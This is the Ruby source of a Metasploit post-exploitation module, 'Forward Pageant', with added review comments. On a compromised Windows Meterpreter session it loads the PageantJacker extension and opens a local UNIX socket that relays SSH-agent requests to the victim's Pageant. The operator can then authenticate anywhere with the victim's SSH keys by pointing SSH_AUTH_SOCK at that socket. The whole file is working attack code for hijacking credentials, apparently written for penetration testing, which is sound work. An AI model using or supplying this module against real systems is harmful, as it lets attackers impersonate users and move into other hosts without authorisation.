metasploit-framework/modules/post/windows/manage/forward_pageant.rb


##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex'
require 'tmpdir'
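# Post module that opens a local UNIX socket and relays every request read
# from it to the PageantJacker Meterpreter extension on a Windows session,
# then writes the extension's answer back to the local client.
#
# The status messages tell the operator to point SSH_AUTH_SOCK at the socket,
# so local tools treat it as an SSH agent. Requests and responses are passed
# through as opaque byte strings; nothing in this class parses them.
#
# Anything that can connect to the socket can issue requests through the
# session for as long as the module runs, so the socket file is removed again
# in #cleanup.
class Metasploit3 < Msf::Post

  include Msf::Post::Windows::Priv

  # Registers the module metadata with the framework.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info={})
    super( update_info( info,
      'Name'          => 'Forward Pageant',
      'Description'   => %q{
        This module forwards Pageant.
      },
      'License'       => MSF_LICENSE,
      'Author'        => 'Stuart Morgan <stuart.morgan[at]mwrinfosecurity.com>',
      'Platform'      => [ 'win' ],
      'SessionTypes'  => [ 'meterpreter' ]
    ))

    #register_options(
    #  [
    #  ], self.class)
  end

  # Loads the extension if needed, creates the listening socket and serves
  # local clients one at a time until the module is interrupted.
  #
  # @return [false] when the extension cannot be loaded or the socket path
  #   already exists; otherwise the accept loop does not return normally
  def run
    # Load the PageantJacker extension on demand (the original comment said
    # "incognito", left over from another module).
    unless session.pageantjacker
      print_status("Loading PageantJacker extension on session #{session.sid} (#{session.session_host})")
      session.core.use("pageantjacker")
    end

    unless session.pageantjacker
      print_error("Failed to load PageantJacker on session #{session.sid} (#{session.session_host})")
      return false
    end

    # NOTE(review): Dir::Tmpname.make_tmpname is an internal helper of the
    # tmpdir library and is not available on newer Ruby releases - confirm
    # against the Ruby version this framework build supports.
    @sockpath = "#{::Dir::Tmpname.tmpdir}/#{::Dir::Tmpname.make_tmpname('pageantjacker', 5)}"

    # File.exist? replaces the deprecated File.exists? alias. The check only
    # produces a friendlier message: if the path appears between this check
    # and the bind, UNIXServer.open raises instead of reusing it.
    if ::File.exist?(@sockpath)
      print_error("Your requested socket (#{@sockpath}) already exists. Remove it or choose another path and try again.")
      return false
    end

    ::UNIXServer.open(@sockpath) do |serv|
      print_status("Launched listening socket on #{@sockpath}.")
      print_status("Set SSH_AUTH_SOCK variable to #{@sockpath} (e.g. export SSH_AUTH_SOCK=\"#{@sockpath}\")")
      print_status("Now use any tool normally (e.g. ssh-add)")

      loop do
        s = serv.accept
        begin
          loop do
            # NOTE(review): each read of up to 8192 bytes is forwarded as one
            # request; a larger or fragmented message would be split - confirm
            # the extension tolerates that.
            socket_request_data = s.recvfrom(8192)
            break if socket_request_data.nil? || socket_request_data.first.nil? || socket_request_data.first.empty?

            request = socket_request_data.first
            # `session` is used throughout; the original mixed it with `client`.
            response_data = session.pageantjacker.forward_to_pageant(request, request.size)
            s.send(response_data, 0) unless response_data.nil?
          end
        ensure
          # The original never closed accepted connections, leaking one file
          # descriptor per local client.
          s.close
        end
      end
    end
  end

  # Removes the socket file created by #run, if any.
  #
  # @return [void]
  def cleanup
    # #run can return before @sockpath is assigned (extension failed to load);
    # File.exist?(nil) would raise a TypeError in that case.
    return unless @sockpath

    ::File.delete(@sockpath) if ::File.exist?(@sockpath)
  end

end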